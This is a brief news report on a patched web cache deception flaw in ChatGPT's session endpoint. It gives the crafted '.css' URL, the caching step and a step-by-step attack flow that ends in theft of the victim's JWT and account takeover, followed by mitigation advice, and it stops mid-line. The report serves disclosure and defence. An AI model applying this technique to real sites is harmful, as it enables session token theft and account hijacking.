The OpenAI team has fixed a critical ChatGPT vulnerability that allows hackers to take over someone else's account, view chat history and access payment information. The mistake was reported to the company by Nagli bughunter and provided a video demonstration.
The researcher managed to carry out a Web Cache Deception attack. While examining the requests processing the ChatGPT authentication flow, the specialist noticed a GET request that can reveal information about the user: "https://chat.openai.com/api/auth/session"
Each time you log in to a ChatGPT instance, the application retrieves account information - email, name, image, and Access Token - from the server. It looks like this:
The expert simulated a situation where a victim receives from an attacker a link to a non-existent resource with a file extension appended to the endpoint: "chat.openai.com/api/auth/session/test.css"
OpenAI returns sensitive data in JSON after adding "css" file extension. This could be due to a regex error, or simply because the developers didn't take this attack vector into account.
Next, the specialist changed the response header "CF-Cache-Status" to the value "HIT". This means that the data has been cached and will be returned on the next request to the same address. As a result, the attacker obtains the necessary data to intercept the victim's token.
- The attacker creates a dedicated ".css" path to the "/api/auth/session" endpoint;
- The hacker distributes the link (directly to the victim or publicly);
- The victim follows the link;
- The response is cached.
The cybercriminal obtains the JWT (JSON Web Token) credentials and gains full access to the target's account.
- Using a regular expression, instruct the caching server not to intercept the endpoint (OpenAI fixed the bug with this method);
- Don't return a private JSON response unless you directly request the desired endpoint:
- http://chat.openai.com/api/auth/session !=